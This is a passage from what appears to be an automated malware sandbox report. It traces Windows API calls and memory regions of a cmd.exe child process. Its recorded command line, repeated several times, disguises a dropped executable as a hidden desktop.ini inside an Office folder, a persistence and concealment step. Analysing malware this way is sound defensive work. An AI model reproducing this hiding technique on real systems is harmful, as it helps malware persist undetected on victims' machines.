hFindFile=0x460eb0 | out: hFindFile=0x460eb0) returned 1 [0152.195] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0152.196] _close (_FileHandle=3) returned 0 [0152.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.196] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.196] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.196] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0152.197] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.197] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0152.197] SetConsoleInputExeNameW () returned 0x1 [0152.197] GetConsoleOutputCP () returned 0x1b5 [0152.197] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.197] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.197] exit (_Code=0) Process: id = "247" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a20" os_pid = "0xc54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This 
Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20218 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20219 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20220 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20221 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 20222 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20223 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20224 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20225 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20226 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 20227 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20276 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000010000" filename = "" Region: id = 20277 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20278 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20279 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 20280 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 20281 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20282 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20283 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20284 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20285 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20286 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" 
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20287 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20288 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20289 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20290 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 20291 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20292 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20293 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 20294 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 20295 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 20296 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 20297 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 20298 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 20299 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 20324 start_va = 0x12f0000 end_va = 0x15befff entry_point = 0x12f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 310 os_tid = 0xc78 [0152.079] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afbac | out: lpSystemTimeAsFileTime=0x1afbac*(dwLowDateTime=0x94957320, dwHighDateTime=0x1d440a9)) [0152.079] GetCurrentProcessId () returned 0xc54 [0152.079] GetCurrentThreadId () returned 0xc78 [0152.079] GetTickCount () returned 0x2eeff [0152.079] QueryPerformanceCounter (in: lpPerformanceCount=0x1afba4 | out: lpPerformanceCount=0x1afba4*=20886850735) returned 1 [0152.080] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0152.080] __set_app_type (_Type=0x1) [0152.080] __p__fmode () returned 0x76b331f4 [0152.080] __p__commode () returned 0x76b331fc [0152.080] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0152.080] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0152.081] GetCurrentThreadId () returned 0xc78 [0152.081] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc78) returned 0x38 [0152.081] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0152.081] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0152.081] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.081] 
HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0152.081] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afb3c | out: phkResult=0x1afb3c*=0x0) returned 0x2 [0152.081] VirtualQuery (in: lpAddress=0x1afb73, lpBuffer=0x1afb0c, dwLength=0x1c | out: lpBuffer=0x1afb0c*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.081] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afb0c, dwLength=0x1c | out: lpBuffer=0x1afb0c*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0152.081] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afb0c, dwLength=0x1c | out: lpBuffer=0x1afb0c*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0152.081] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afb0c, dwLength=0x1c | out: lpBuffer=0x1afb0c*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.081] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afb0c, dwLength=0x1c | out: lpBuffer=0x1afb0c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0152.081] GetConsoleOutputCP () returned 0x1b5 [0152.081] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.082] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0152.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.082] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0152.082] _get_osfhandle (_FileHandle=1) returned 0x7 
[0152.082] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0152.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.082] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.082] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.082] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0152.082] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.082] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0152.083] GetEnvironmentStringsW () returned 0x300560* [0152.083] FreeEnvironmentStringsW (penv=0x300560) returned 1 [0152.083] GetEnvironmentStringsW () returned 0x300560* [0152.083] FreeEnvironmentStringsW (penv=0x300560) returned 1 [0152.083] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeaac | out: phkResult=0x1aeaac*=0x40) returned 0x0 [0152.083] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x0, lpData=0x1aeab8*=0x10, lpcbData=0x1aeab0*=0x1000) returned 0x2 [0152.083] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x1, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.083] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x0, lpData=0x1aeab8*=0x1, lpcbData=0x1aeab0*=0x1000) returned 0x2 [0152.083] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x0, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.083] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", 
lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x40, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.083] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x40, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.083] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x0, lpData=0x1aeab8*=0x40, lpcbData=0x1aeab0*=0x1000) returned 0x2 [0152.083] RegCloseKey (hKey=0x40) returned 0x0 [0152.084] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeaac | out: phkResult=0x1aeaac*=0x40) returned 0x0 [0152.084] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x0, lpData=0x1aeab8*=0x40, lpcbData=0x1aeab0*=0x1000) returned 0x2 [0152.084] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x1, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.084] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x0, lpData=0x1aeab8*=0x1, lpcbData=0x1aeab0*=0x1000) returned 0x2 [0152.084] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x0, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.084] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, 
lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x9, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.084] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x9, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.084] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x0, lpData=0x1aeab8*=0x9, lpcbData=0x1aeab0*=0x1000) returned 0x2 [0152.084] RegCloseKey (hKey=0x40) returned 0x0 [0152.084] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637a [0152.084] srand (_Seed=0x5b88637a) [0152.084] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"" [0152.084] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"" [0152.084] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.084] 
GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301cc0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0152.085] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0152.085] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0152.085] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0152.085] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0152.085] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0152.085] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0152.085] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0152.085] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0152.085] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0152.085] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0152.085] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0152.085] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0152.085] GetEnvironmentStringsW () returned 0x3026b0* [0152.085] FreeEnvironmentStringsW (penv=0x3026b0) returned 1 [0152.085] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.085] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0152.085] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0152.085] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0152.085] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 
[0152.085] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0152.086] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0152.086] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0152.086] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0152.086] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0152.086] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af878 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.086] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af878, lpFilePart=0x1af874 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af874*="Desktop") returned 0x18 [0152.086] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.086] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af5f4 | out: lpFindFileData=0x1af5f4) returned 0x300d40 [0152.086] FindClose (in: hFindFile=0x300d40 | out: hFindFile=0x300d40) returned 1 [0152.086] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af5f4 | out: lpFindFileData=0x1af5f4) returned 0x300d40 [0152.086] FindClose (in: hFindFile=0x300d40 | out: hFindFile=0x300d40) returned 1 [0152.086] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af5f4 | out: lpFindFileData=0x1af5f4) returned 0x300d40 [0152.087] FindClose (in: hFindFile=0x300d40 | out: hFindFile=0x300d40) returned 1 [0152.087] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.087] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0152.087] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0152.087] GetEnvironmentStringsW () returned 0x300560* [0152.087] FreeEnvironmentStringsW (penv=0x300560) returned 1 
[0152.087] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.088] GetConsoleOutputCP () returned 0x1b5 [0152.088] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.088] GetUserDefaultLCID () returned 0x409 [0152.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0152.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af9b8, cchData=128 | out: lpLCData="0") returned 2 [0152.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af9b8, cchData=128 | out: lpLCData="0") returned 2 [0152.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af9b8, cchData=128 | out: lpLCData="1") returned 2 [0152.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0152.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0152.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0152.089] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0152.089] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0152.089] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0152.089] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0152.089] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0152.089] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0152.089] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, 
lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0152.089] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0152.090] GetConsoleTitleW (in: lpConsoleTitle=0x2f0b48, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.090] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0152.090] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0152.090] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0152.090] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0152.091] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0152.091] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0152.091] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0152.091] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0152.091] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0152.091] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0152.091] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0152.094] _wcsicmp (_String1="del", _String2=")") returned 59 [0152.094] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0152.094] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0152.094] _wcsicmp (_String1="IF", _String2="del") returned 5 [0152.094] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0152.094] _wcsicmp (_String1="REM", _String2="del") returned 14 [0152.094] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0152.097] _wcsicmp (_String1="type", _String2=")") returned 75 [0152.097] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0152.097] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0152.097] _wcsicmp (_String1="IF", _String2="type") returned -11 [0152.097] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0152.097] _wcsicmp (_String1="REM", _String2="type") returned -2 
